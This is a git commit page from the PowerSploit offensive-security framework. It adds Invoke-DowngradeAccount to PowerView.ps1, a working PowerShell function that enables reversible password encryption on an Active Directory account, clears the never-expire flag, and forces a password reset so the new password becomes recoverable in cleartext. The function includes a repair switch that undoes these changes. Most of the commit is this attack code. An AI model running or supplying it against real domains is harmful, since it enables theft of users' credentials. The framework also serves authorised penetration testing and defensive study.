Added Invoke-DowngradeAccount to set an account to use reversible encryption.

author: Harmj0y <will@harmj0y.net> 2015-12-11 14:58:07 -0500
committer: Harmj0y <will@harmj0y.net> 2015-12-11 14:58:07 -0500
commit: a336562b700b462b507182be875a76919db58d88 (patch)
tree: 1e32ba2b79d29f16f47e22733c2212b96c763903 /Recon
parent: a0b95c36b4a3ce0a172fcf98426601f2faa18d64 (diff)
download: PowerSploit-a336562b700b462b507182be875a76919db58d88.tar.gz
PowerSploit-a336562b700b462b507182be875a76919db58d88.zip
1 files changed, 117 insertions, 1 deletions
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
index 0745916..46285f4 100644
--- a/Recon/PowerView.ps1
+++ b/Recon/PowerView.ps1
@@ -3618,6 +3618,10 @@ function Set-ADObject {
 
         Domain controller to reflect LDAP queries through.
 
+    .PARAMETER Filter
+
+        Additional LDAP filter string for the query.
+
     .PARAMETER PropertyName
 
         The property name to set.
@@ -3628,7 +3632,7 @@ function Set-ADObject {
 
     .PARAMETER PropertyXorValue
 
-        Integer calue to binary xor (-bxor) with the current int value.
+        Integer value to binary xor (-bxor) with the current int value.
 
     .PARAMETER ClearValue
 
@@ -3668,6 +3672,9 @@ function Set-ADObject {
         [String]
         $DomainController,
 
+        [String]
+        $Filter,
+
         [Parameter(Mandatory = $True)]
         [String]
         $PropertyName,
@@ -3691,6 +3698,7 @@ function Set-ADObject {
         'SamAccountName' = $SamAccountName
         'Domain' = $Domain
         'DomainController' = $DomainController
+        'Filter' = $Filter
         'PageSize' = $PageSize
     }
     # splat the appropriate arguments to Get-ADObject
@@ -3726,6 +3734,114 @@ function Set-ADObject {
 }
 
 
+function Invoke-DowngradeAccount {
+<#
+    .SYNOPSIS
+
+        Set reversible encryption on a given account and then force the password
+        to be set on next user login. To repair use "-Repair".
+
+    .PARAMETER SamAccountName
+
+        The SamAccountName of the domain object you're querying for. 
+
+    .PARAMETER Name
+
+        The Name of the domain object you're querying for.
+
+    .PARAMETER Domain
+
+        The domain to query for objects, defaults to the current domain.
+
+    .PARAMETER DomainController
+
+        Domain controller to reflect LDAP queries through.
+
+    .PARAMETER Filter
+
+        Additional LDAP filter string for the query.
+
+    .PARAMETER Repair
+
+        Switch. Unset the reversible encryption flag and force password reset flag.
+
+    .EXAMPLE
+
+        PS> Invoke-DowngradeAccount -SamAccountName jason
+
+        Set reversible encryption on the 'jason' account and force the password to be changed.
+
+    .EXAMPLE
+
+        PS> Invoke-DowngradeAccount -SamAccountName jason -Repair
+
+        Unset reversible encryption on the 'jason' account and remove the forced password change.
+#>
+
+    [CmdletBinding()]
+    Param (
+        [Parameter(Position=0,ValueFromPipeline=$True)]
+        [String]
+        $SamAccountName,
+
+        [String]
+        $Name,
+
+        [String]
+        $Domain,
+
+        [String]
+        $DomainController,
+
+        [String]
+        $Filter,
+
+        [Switch]
+        $Repair
+    )
+
+    process {
+        $Arguments = @{
+            'SamAccountName' = $SamAccountName
+            'Name' = $Name
+            'Domain' = $Domain
+            'DomainController' = $DomainController
+            'Filter' = $Filter
+        }
+
+        # splat the appropriate arguments to Get-ADObject
+        $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue
+
+        if($Repair) {
+
+            if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") {
+                # if reversible encryption is set, unset it
+                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
+            }
+
+            # unset the forced password change
+            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1
+        }
+
+        else {
+
+            if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") {
+                # if the password is set to never expire, unset
+                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536
+            }
+
+            if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") {
+                # if reversible encryption is not set, set it
+                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
+            }
+
+            # force the password to be changed on next login
+            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0
+        }
+    }
+}
+
+
 function Get-ComputerProperty {
 <#
     .SYNOPSIS
author	Harmj0y <will@harmj0y.net>	2015-12-11 14:58:07 -0500
committer	Harmj0y <will@harmj0y.net>	2015-12-11 14:58:07 -0500
commit	a336562b700b462b507182be875a76919db58d88 (patch)
tree	1e32ba2b79d29f16f47e22733c2212b96c763903 /Recon
parent	a0b95c36b4a3ce0a172fcf98426601f2faa18d64 (diff)
download	PowerSploit-a336562b700b462b507182be875a76919db58d88.tar.gz PowerSploit-a336562b700b462b507182be875a76919db58d88.zip